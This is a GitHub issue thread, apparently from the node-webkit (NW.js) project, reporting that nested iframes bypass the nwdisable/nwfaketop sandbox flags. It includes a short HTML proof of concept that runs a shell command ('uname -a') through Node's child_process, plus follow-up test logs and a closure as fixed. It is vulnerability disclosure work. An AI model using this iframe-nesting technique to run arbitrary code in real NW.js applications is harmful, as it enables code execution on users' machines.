Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Bypassing nwdisable in file:// and app:// frames #1614

ecneladis opened this issue Feb 24, 2014 · 2 comments

Bypassing nwdisable in file:// and app:// frames #1614

ecneladis opened this issue Feb 24, 2014 · 2 comments


Copy link

@ecneladis ecneladis commented Feb 24, 2014


It's possible to bypass nwdisable and nwfaketop flags by nesting iframes inside top-level sandboxed iframe that uses file:// or app://.

I'd also suggest to enforce these flags by default and disable them only at will in package.json, because the outcome of some vulnerabilities is not only the execution of javascript in the context of the whole application like in classical xss, but also access to file system and execution of arbitrary code due to nodejs modules.

Proof of concept
<!doctype html>
    <meta charset="utf-8">
    <title>Testing nwfaketop and nwdisable</title>
    <iframe src="file:///home/stardust/dev/sectest/node-webkit/nwfaketop/test.html" nwdisable nwfaketop>
   var exec = require('child_process').exec;
   exec('uname -a',function (error, stdout, stdin) {alert(stdout)});

<iframe src="file:///home/stardust/dev/sectest/node-webkit/nwfaketop/test.html">

testing nwfaketop and nwdisable

Want to back this issue? Post a bounty on it! We accept bounties via Bountysource.

@rogerwang rogerwang self-assigned this Mar 3, 2014

This comment has been minimized.

Copy link

@mikedawson mikedawson commented Jun 2, 2014

I notice this is flagged as open - I'm planning to do the same in my app. Just to be sure nodejs was working in the parent and not in the child Iframe I added the following to the parent nwfaketop.html:

<script type='text/javascript'>
    var exec = require('child_process').exec;
    exec('uname -a',function (error, stdout, stdin) {console.log("Faketop parent success: " + stdout)});

The result from the console log was:

[6176:0602/] NVCtrl extension does not exist.
[6176:0602/] After loading Root Certs, loaded==false: NSS error code: -8018
[6176:0602/205940:INFO:CONSOLE(2)] "Uncaught ReferenceError: require is not defined", source: file:///home/mike/tmp/nodeweb/securitytest/test.html (2)
[6176:0602/205940:INFO:CONSOLE(9)] ""Faketop parent success: Linux mike-Inspiron-5523 3.13.0-27-generic #50-Ubuntu SMP Thu May 15 18:06:16 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux\n"", source: file:///tmp/.org.chromium.Chromium.W2hnbk/nwfaketop.html (9)

Seems like the issue has been resolved.. that code is failing inside the frame, but succeeding inside the main context as it should do.


This comment has been minimized.

Copy link

@nwjs-bot nwjs-bot commented Aug 24, 2016

This should be working with latest version now.

In 0.13 we changed to an optimized architecture so more features can be supported, see and it's good for keeping up with Chromium upstream -- we released with Node.js v6.0 and new Chromium versions within 1 day after upstream release.

The new version would fixed many issues reported here and we're scrubbing them. This issue is closed as we believe it should be fixed. Please leave a message if it isn't and we'll reopen it.

@nwjs-bot nwjs-bot closed this Aug 24, 2016
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
None yet
4 participants
You can’t perform that action at this time.